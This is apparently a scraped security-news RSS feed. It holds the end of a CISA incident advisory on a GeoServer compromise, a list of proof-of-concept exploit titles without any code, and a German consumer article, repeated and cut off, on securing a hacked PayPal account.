<li><strong>Implement allowlisting </strong>for applications, scripts, and network traffic to prevent unauthorized execution and access.</li>
</ul>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <a href="https://www.cisa.gov/#Table%C2%A03.%20Resource%20Development" title="Table 3. Resource Development"><strong>Table 3</strong></a> through <a href="https://www.cisa.gov/#Table%C2%A011.%20Command%20and%20Control" title="Table 11. Command and Control"><strong>Table 11</strong></a>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2>Resources</h2>
<ul>
<li><a href="https://www.cisa.gov/resources-tools/resources/incident-response-plan-irp-basics" title="Incident Response Plan (IRP) Basics">Incident Response Plan (IRP) Basics</a></li>
<li><a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">Identifying and Mitigating Living Off the Land Techniques</a></li>
<li><a href="https://www.cisa.gov/resources-tools/resources/phishing-resistant-multi-factor-authentication-mfa-success-story-usdas-fast-identity-online-fido" title="Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation">Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA’s Fast IDentity Online (FIDO) Implementation</a></li>
</ul>
<h2>Disclaimer</h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.</p>
<h2>Version History</h2>
<p><strong>September 23, 2025:</strong> Initial version.</p>
<h2>Apendix: Key Events Timeline</h2>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date/Time</th>
<th role="columnheader">Relevant Host</th>
<th role="columnheader">Event</th>
</tr>
</thead>
<tbody>
<tr>
<td>July 1, 2024</td>
<td>n/a</td>
<td>CVE-2024-36401 published.</td>
</tr>
<tr>
<td>July 11, 2024</td>
<td>GeoServer 1</td>
<td>Initial Access to GeoServer 1.</td>
</tr>
<tr>
<td>July 15, 2024</td>
<td>n/a</td>
<td>CVE-2024-36401 added to CISA’s Known Exploited Vulnerabilities Catalog.</td>
</tr>
<tr>
<td>July 15, 2024</td>
<td>GeoServer 1</td>
<td>EDR detects Stowaway tool on GeoServer 1.</td>
</tr>
<tr>
<td>July 24, 2024</td>
<td>GeoServer 2</td>
<td>Initial Access to GeoServer 2.</td>
</tr>
<tr>
<td>July 31, 2024</td>
<td>Web Server</td>
<td>Initial Access to Web Server.</td>
</tr>
<tr>
<td>July 31, 2024</td>
<td>SQL Server</td>
<td>Initial Access to SQL Server.</td>
</tr>
<tr>
<td>Aug. 1, 2024</td>
<td>SQL Server, GeoServer 1</td>
<td>Organization observes SQL Alert and contains SQL Server and GeoServer 1.</td>
</tr>
<tr>
<td>Aug. 1, 2024</td>
<td>n/a</td>
<td>The impacted organization requested assistance from CISA.</td>
</tr>
<tr>
<td>Aug. 5, 2024</td>
<td>n/a</td>
<td>CISA began forensic artifact analysis.</td>
</tr>
<tr>
<td>Aug. 6, 2024</td>
<td>GeoServer 2</td>
<td>Last observed threat actors’ activity—discovery commands on GeoServer 2.</td>
</tr>
<tr>
<td>Aug. 8 – Sept. 3, 2024</td>
<td>n/a</td>
<td>CISA conducted their full incident response.</td>
</tr>
</tbody>
</table>
</div>
<h2>Notes</h2>
<p><a class="ck-anchor">[1]</a> “GeoServer/GeoServer,” GitHub, published July 1, 2024, <a href="https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w" target="_blank" title="GitHub GeoServer">https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w</a>.</p>
<p><a class="ck-anchor">[2]</a> “firefart/dirtycow,” GitHub, last modified 2021,<em> </em><a href="https://github.com/firefart/dirtycow" target="_blank" title="GitHub dirtycow">https://github.com/firefart/dirtycow</a>.</p>
<p><a class="ck-anchor">[3]</a> “T4y1oR/RingQ” GitHub, last modified February 19, 2025. <a href="https://github.com/T4y1oR/RingQ" target="_blank" title="GitHub RingQ">https://github.com/T4y1oR/RingQ</a>.</p>
<p><a class="ck-anchor">[4]</a> “shadow1ng/fscan,” GitHub, last modified July 2025, <a href="https://github.com/shadow1ng/fscan" target="_blank" title="GitHub fscan">https://github.com/shadow1ng/fscan</a>.</p>
<p><a class="ck-anchor">[5]</a> “ph4ntonn/Stowaway,” GitHub, last modified April 2025,<em> </em><a href="https://github.com/ph4ntonn/Stowaway" target="_blank" title="GitHub Stowaway">https://github.com/ph4ntonn/Stowaway</a>.</p>
<hr></div>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Flowise 3.0.4 - Remote Code Execution (RCE)]]></title>
<description><![CDATA[Flowise 3.0.4 - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/3072477/poc/webapps-flowise-304-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3072477/poc/webapps-flowise-304-remote-code-execution-rce/</guid>
<pubDate>Fri, 31 Oct 2025 10:23:24 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Flowise 3.0.4 - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)]]></title>
<description><![CDATA[Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)]]></description>
<link>https://tsecurity.de/de/3067893/poc/webapps-casdoor-2950-cross-site-request-forgery-csrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3067893/poc/webapps-casdoor-2950-cross-site-request-forgery-csrf/</guid>
<pubDate>Wed, 29 Oct 2025 06:39:03 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Casdoor 2.95.0 - Cross-Site Request Forgery (CSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Concrete CMS 9.4.3 - Stored XSS]]></title>
<description><![CDATA[Concrete CMS 9.4.3 - Stored XSS]]></description>
<link>https://tsecurity.de/de/3010944/poc/webapps-concrete-cms-943-stored-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010944/poc/webapps-concrete-cms-943-stored-xss/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:16 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Concrete CMS 9.4.3 - Stored XSS]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection]]></title>
<description><![CDATA[ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3010941/poc/webapps-elex-woocommerce-wordpress-plugin-143-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010941/poc/webapps-elex-woocommerce-wordpress-plugin-143-sql-injection/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:12 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)]]></title>
<description><![CDATA[XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/3010940/poc/webapps-xwiki-platform-151010-metasploit-module-for-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010940/poc/webapps-xwiki-platform-151010-metasploit-module-for-remote-code-execution-rce/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:10 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)]]></title>
<description><![CDATA[Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)]]></description>
<link>https://tsecurity.de/de/3010939/poc/webapps-casdoor-2550-cross-site-request-forgery-csrf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010939/poc/webapps-casdoor-2550-cross-site-request-forgery-csrf/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:09 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] dotCMS 25.07.02-1 - Authenticated Blind SQL Injection]]></title>
<description><![CDATA[dotCMS 25.07.02-1 - Authenticated Blind SQL Injection]]></description>
<link>https://tsecurity.de/de/3010938/poc/webapps-dotcms-250702-1-authenticated-blind-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010938/poc/webapps-dotcms-250702-1-authenticated-blind-sql-injection/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:07 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[dotCMS 25.07.02-1 - Authenticated Blind SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Tourism Management System 2.0 - Arbitrary Shell Upload]]></title>
<description><![CDATA[Tourism Management System 2.0 - Arbitrary Shell Upload]]></description>
<link>https://tsecurity.de/de/3010937/poc/webapps-tourism-management-system-20-arbitrary-shell-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3010937/poc/webapps-tourism-management-system-20-arbitrary-shell-upload/</guid>
<pubDate>Mon, 29 Sep 2025 18:07:06 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tourism Management System 2.0 - Arbitrary Shell Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[Paypal-Konto gehackt? Das können Sie tun]]></title>
<description><![CDATA[Zuerst sorgte ein Datendiebstahl bei Paypal für Aufsehen: Ein Hacker will Zugangsdaten zu rund 15,8 Millionen Konten im Netz verkaufen – inklusive Passwörtern im Klartext. Für betroffene Nutzer kann das zum Albtraum werden. Denn über ein kompromittiertes Paypal-Konto können Kriminelle nicht nur G...]]></description>
<link>https://tsecurity.de/de/2969832/windows-tipps/paypal-konto-gehackt-das-koennen-sie-tun/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2969832/windows-tipps/paypal-konto-gehackt-das-koennen-sie-tun/</guid>
<pubDate>Sat, 06 Sep 2025 23:42:05 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zuerst sorgte ein Datendiebstahl bei Paypal für Aufsehen: Ein Hacker will <a href="https://www.pcwelt.de/article/2881399/15-8-millionen-paypal-zugaenge-gestohlen-das-muessen-paypal-nutzer-jetzt-tun.html" target="_blank" rel="noreferrer noopener">Zugangsdaten zu rund 15,8 Millionen Konten im Netz verkaufen</a> – inklusive Passwörtern im Klartext. Für betroffene Nutzer kann das zum Albtraum werden. Denn über ein kompromittiertes Paypal-Konto können Kriminelle nicht nur Guthaben stehlen, sondern mitunter auch direkt auf Bankkonten oder Kreditkarten zugreifen.</p>



<p>Wenige Tage später kam es noch dicker für Paypal-Kunden: <a href="https://www.pcwelt.de/article/2890314/paypal-sicherheitsluecke-deutsche-banken-stoppen-zahlungen-das-muessen-kunden-wissen.html" target="_blank" rel="noreferrer noopener">Wegen einer Paypal-Sicherheitslücke stoppten deutsche Banken Zahlungen in Milliardenhöhe.</a></p>



<p>Doch keine Panik: Wer schnell reagiert, kann den Schaden begrenzen. Wir zeigen, was Sie jetzt sofort tun sollten und wie Sie Ihr Paypal-Konto künftig bestmöglich absichern.</p>



<h2 class="wp-block-heading">Sofortmaßnahmen: Das müssen Sie jetzt tun</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68bca7633990b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?w=1198" alt="Paypal Passwort ändern web" class="wp-image-2887845" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?quality=50&amp;strip=all 1438w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=150%2C150&amp;quality=50&amp;strip=all 150w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=300%2C300&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=768%2C769&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=1198%2C1200&amp;quality=50&amp;strip=all 1198w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=1240%2C1240&amp;quality=50&amp;strip=all 1240w" width="1198" height="1200" sizes="auto, (max-width: 1198px) 100vw, 1198px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Im ersten Schritt sollten Sie unbedingt Ihr Paypal-Passwort ändern.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Wenn Sie vermuten, dass Ihr Paypal-Konto gehackt wurde, oder wenn Sie sogar schon <strong>unbefugte Transaktionen</strong> sehen, dann zählt jede Minute. Gehen Sie sofort diese Schritte durch:</p>



<ol start="1" class="wp-block-list">
<li><strong>Passwort ändern</strong><br>Melden Sie sich umgehend bei <a href="https://www.paypal.com/de/webapps/mpp/home" target="_blank" rel="noreferrer noopener">Paypal</a> an und vergeben Sie ein neues, starkes Passwort: Oben rechts auf das <em>Zahnrad-Symbol -&gt; Sicherheit -&gt; Passwort -&gt; Aktualisieren</em>. Wichtig: Falls Sie dasselbe Passwort auch für Ihr E-Mail-Konto oder andere Dienste genutzt haben, ändern Sie es dort ebenfalls umgehend. <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Nutzen Sie am besten einen guten Passwort-Manager</a>.<br><br></li>



<li><strong>Zwei-Faktor-Authentifizierung aktivieren</strong><br>Richten Sie die 2FA in den Sicherheitseinstellungen von Paypal ein. Am sichersten ist die Anmeldung per Authenticator-App, nicht nur per SMS. Damit verhindern Sie, dass Angreifer allein mit Ihrem Passwort Zugriff auf Ihr Konto bekommen. Die „Zweistufige Verifizierung“ finden Sie ebenfalls unter „Sicherheit“.<br><br></li>



<li><strong>Zahlungen überprüfen</strong><br>Gehen Sie Ihre letzten Transaktionen bei Paypal und auf dem verknüpften Bankkonto oder Ihrer Kreditkarte sorgfältig durch. Je früher Sie Unregelmäßigkeiten entdecken, desto schneller können Sie reagieren. Ihre Bezahl-Historie finden Sie unter „Aktivitäten“.<br><br></li>



<li><strong>Unbefugte Zahlungen melden</strong><br>Nutzen Sie die Konfliktlösung von Paypal, um verdächtige Abbuchungen zu reklamieren. Paypal prüft den Fall und erstattet in vielen Fällen das Geld zurück.<br><br></li>



<li><strong>Fremde Geräte abmelden</strong><br>Wenn Sie den Verdacht haben, dass jemand unbefugt auf Ihr Paypal-Konto zugegriffen hat, sollten Sie <strong>sofort alle fremden Sitzungen beenden</strong>. Gehen Sie dazu in die <strong>Sicherheitseinstellungen</strong> Ihres Kontos: Unter <em>Sicherheit</em> -&gt; <em>Logins verwalten</em> sehen Sie eine Liste aller aktiven Logins. Prüfen Sie die aufgeführten Geräte und melden Sie alles ab, was Ihnen unbekannt vorkommt. Mit einem Klick auf <strong>„Entfernen“</strong> kappen Sie den Zugriff von Hackern sofort.<br><br></li>



<li><strong>Vorfall bei Paypal melden und Support kontaktieren</strong><br>Wenn Sie unbefugte Aktivitäten auf Ihrem Paypal-Konto entdecken, sollten Sie den Vorfall <strong>sofort melden</strong>. Gehen Sie dazu ins Menü <strong>Aktivitäten</strong>, wählen Sie die verdächtige Transaktion aus und klicken Sie anschließend auf <strong>„Problem melden“</strong>. Folgen Sie den angezeigten Schritten – Paypal prüft den Vorfall und kann unautorisierte Zahlungen erstatten. Gleichzeitig lohnt sich der direkte Kontakt mit dem <a href="https://www.paypal.com/de/cshelp/contact-us" target="_blank" rel="noreferrer noopener">Paypal-Support</a>: Dort kann Ihr Konto zusätzlich abgesichert oder im Ernstfall vorübergehend gesperrt werden. Je schneller Sie reagieren, desto besser ist Ihr Konto geschützt und mögliche Schäden können vermieden werden.<br><br></li>



<li><strong>Bank und Kreditkartenanbieter informieren</strong><br>Falls schon Geld abgeflossen ist, setzen Sie auch Ihre Bank oder Ihr Kreditkarteninstitut in Kenntnis. Gegebenenfalls lassen Sie Karten sperren oder neue Zugangsdaten ausstellen. Nutzen Sie dafür die <strong>Sperrhotline 116 116</strong> (in Deutschland rund um die Uhr erreichbar), um Karten sofort zu sperren.</li>
</ol>



<p><strong>Lesetipp zum Thema: </strong><a href="https://www.pcwelt.de/article/2808935/paypal-kontaktloses-bezahlen-an-der-kasse-so-gehts.html" target="_blank" rel="noreferrer noopener">Mit Paypal kontaktlos an der Kasse bezahlen – so geht es</a></p>



<h2 class="wp-block-heading">Wie schütze ich mein Paypal-Konto richtig?</h2>



<p>Keine Frage: Ein gehacktes Konto ist der Super-GAU. Doch mit ein paar Vorkehrungen machen Sie es Betrügern extrem schwer, an Ihr Geld zu kommen. Diese Schutzmaßnahmen sind für Paypal essentiell:</p>



<p><strong>Ein starkes Passwort erstellen:</strong> Ihr Passwort ist der Schlüssel zu Ihrem Geld. Nutzen Sie eine lange Kombination aus Buchstaben, Zahlen und Sonderzeichen – und verwenden Sie das Passwort ausschließlich für Paypal. <a href="https://www.pcwelt.de/article/1204833/test-die-besten-passwort-manager.html" target="_blank" rel="noreferrer noopener">Passwort-Manager</a> helfen, den Überblick zu behalten.</p>



<p><strong>Zwei-Faktor-Authentifizierung einschalten</strong>: Mit 2FA legen Sie ein zweites Schloss vor Ihr Konto. Am besten nutzen Sie eine Authenticator-App wie Google Authenticator oder Authy. Der SMS-Code ist besser als nichts, aber weniger sicher.</p>



<p><strong>Phishing erkennen</strong>: Die größte Gefahr kommt oft per Mail oder SMS. Merke: Paypal fragt <strong>niemals nach Ihrem Passwort</strong> oder fordert Sie per Link auf, sich einzuloggen. Tipp: Geben Sie die Paypal-Adresse im Zweifel lieber selbst ins Browserfenster ein, anstatt Links zu klicken.</p>



<p><strong>Nur auf sicheren Geräten einloggen</strong>: Öffentliches WLAN oder fremde Rechner sind ein Einfallstor für Hacker. Loggen Sie sich nur auf Ihren eigenen Geräten ein und halten Sie diese stets mit Updates aktuell.</p>



<p><strong>Benachrichtigungen aktivieren</strong>: Schalten Sie E-Mail- oder Push-Benachrichtigungen für Zahlungen ein. So merken Sie sofort, wenn jemand Unbefugtes versucht, Ihr Konto zu nutzen.</p>



<h2 class="wp-block-heading">Allgemeine Tipps zu Paypal</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68bca7633a3d1"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png" alt="paypal app google play2" class="wp-image-2887863" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png?quality=50&amp;strip=all 1170w, https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png?resize=300%2C281&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/paypal-app-google-play2.png?resize=768%2C720&amp;quality=50&amp;strip=all 768w" width="1024" height="960" sizes="auto, (max-width: 1024px) 100vw, 1024px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Sicherer als der Browser: Mit der Paypal-App (<a href="https://play.google.com/store/apps/details?id=com.paypal.android.p2pmobile&amp;hl=de" target="_blank" rel="noreferrer noopener">Android</a> | <a href="https://apps.apple.com/de/app/paypal-geld-senden-verwalten/id283646709" target="_blank" rel="noreferrer noopener">iOS</a>) sind Nutzer besser vor Phishing geschützt.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Neben den reinen Sicherheitseinstellungen lohnt es sich, auch bei der täglichen Nutzung ein paar Dinge zu beachten. So sind Sie nicht nur vor Hackern besser geschützt, sondern auch vor typischen Betrugsfallen im Netz.</p>



<p><strong>Käuferschutz nutzen</strong><br>Paypal bietet einen Käuferschutz – nutzen Sie ihn. Zahlen Sie nur bei Händlern, die Paypal offiziell akzeptieren. Falls etwas schiefgeht (etwa Ware kommt nicht an oder ist völlig anders als beschrieben), können Sie Ihr Geld über das Konfliktlösungs-Center zurückholen.</p>



<p><strong>Nur an vertrauenswürdige Empfänger überweisen</strong><br>Geld „an Freunde senden“ klingt praktisch, bietet aber keinen Schutz. Nutzen Sie diese Option wirklich nur bei Personen, die Sie persönlich kennen – niemals bei Online-Verkäufern oder Fremden.</p>



<p><strong>E-Mail-Adresse aktuell halten</strong><br>Sicherheitswarnungen oder Bestätigungslinks landen auf der bei Paypal hinterlegten Adresse. Prüfen Sie regelmäßig, ob diese noch aktuell ist – und schützen Sie auch Ihr E-Mail-Konto mit einem starken Passwort und 2FA.</p>



<p><strong>App statt Browser verwenden</strong><br>Die offizielle Paypal-App ist oft sicherer als der Login im Browser. Sie unterstützt moderne Sicherheitsmechanismen, Push-Benachrichtigungen und macht Phishing-Angriffe weniger wahrscheinlich.</p>



<p><strong>Kontobewegungen im Blick behalten</strong><br>Ein kurzer Blick in die App oder ins Online-Konto zwischendurch kann viel Ärger ersparen. So erkennen Sie verdächtige Aktivitäten, bevor es teuer wird.</p>



<h2 class="wp-block-heading">Fazit</h2>



<p>Ein gehacktes Papal-Konto kann sich anfühlen wie ein Einbruch in die eigene Wohnung. Doch mit den richtigen Schritten schließen Sie die Tür schnell wieder ab – und rüsten Ihr digitales Schloss so auf, dass Einbrecher draußen bleiben.</p>



<p>Unser Tipp zum Schluss: <strong>Bleiben Sie wachsam und handeln Sie sofort</strong>, wenn etwas nicht stimmt. So behalten Sie nicht nur Ihr Geld, sondern auch das gute Gefühl, Ihr Konto jederzeit unter Kontrolle zu haben.</p>



<p><strong>Übrigens:</strong> Sicherheit auf Ihren Geräten schützt nicht nur Ihre Daten, sondern auch Ihr Paypal-Konto. Ein aktuelles Antivirus-Programm und regelmäßige Updates machen Hackerangriffe deutlich schwerer – mehr dazu in unserem <a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Ratgeber zu Antiviren-Software</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Paypal-Konto gehackt? Das können Sie tun]]></title>
<description><![CDATA[Zuerst sorgte ein Datendiebstahl bei Paypal für Aufsehen: Ein Hacker will Zugangsdaten zu rund 15,8 Millionen Konten im Netz verkaufen – inklusive Passwörtern im Klartext. Für betroffene Nutzer kann das zum Albtraum werden. Denn über ein kompromittiertes Paypal-Konto können Kriminelle nicht nur G...]]></description>
<link>https://tsecurity.de/de/2964705/windows-tipps/paypal-konto-gehackt-das-koennen-sie-tun/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2964705/windows-tipps/paypal-konto-gehackt-das-koennen-sie-tun/</guid>
<pubDate>Fri, 29 Aug 2025 15:37:17 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Zuerst sorgte ein Datendiebstahl bei Paypal für Aufsehen: Ein Hacker will <a href="https://www.pcwelt.de/article/2881399/15-8-millionen-paypal-zugaenge-gestohlen-das-muessen-paypal-nutzer-jetzt-tun.html" target="_blank" rel="noreferrer noopener">Zugangsdaten zu rund 15,8 Millionen Konten im Netz verkaufen</a> – inklusive Passwörtern im Klartext. Für betroffene Nutzer kann das zum Albtraum werden. Denn über ein kompromittiertes Paypal-Konto können Kriminelle nicht nur Guthaben stehlen, sondern mitunter auch direkt auf Bankkonten oder Kreditkarten zugreifen.</p>



<p>Wenige Tage später kam es noch dicker für Paypal-Kunden: <a href="https://www.pcwelt.de/article/2890314/paypal-sicherheitsluecke-deutsche-banken-stoppen-zahlungen-das-muessen-kunden-wissen.html" target="_blank" rel="noreferrer noopener">Wegen einer Paypal-Sicherheitslücke stoppten deutsche Banken Zahlungen in Milliardenhöhe.</a></p>



<p>Doch keine Panik: Wer schnell reagiert, kann den Schaden begrenzen. Wir zeigen, was Sie jetzt sofort tun sollten und wie Sie Ihr Paypal-Konto künftig bestmöglich absichern.</p>



<h2 class="wp-block-heading">Sofortmaßnahmen: Das müssen Sie jetzt tun</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"68b1acf5becdd"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?w=1198" alt="Paypal Passwort ändern web" class="wp-image-2887845" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?quality=50&amp;strip=all 1438w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=150%2C150&amp;quality=50&amp;strip=all 150w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=300%2C300&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=768%2C769&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=1198%2C1200&amp;quality=50&amp;strip=all 1198w, https://b2c-contenthub.com/wp-content/uploads/2025/08/Paypal-Passwort-andern-web.png?resize=1240%2C1240&amp;quality=50&amp;strip=all 1240w" width="1198" height="1200" sizes="auto, (max-width: 1198px) 100vw, 1198px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" 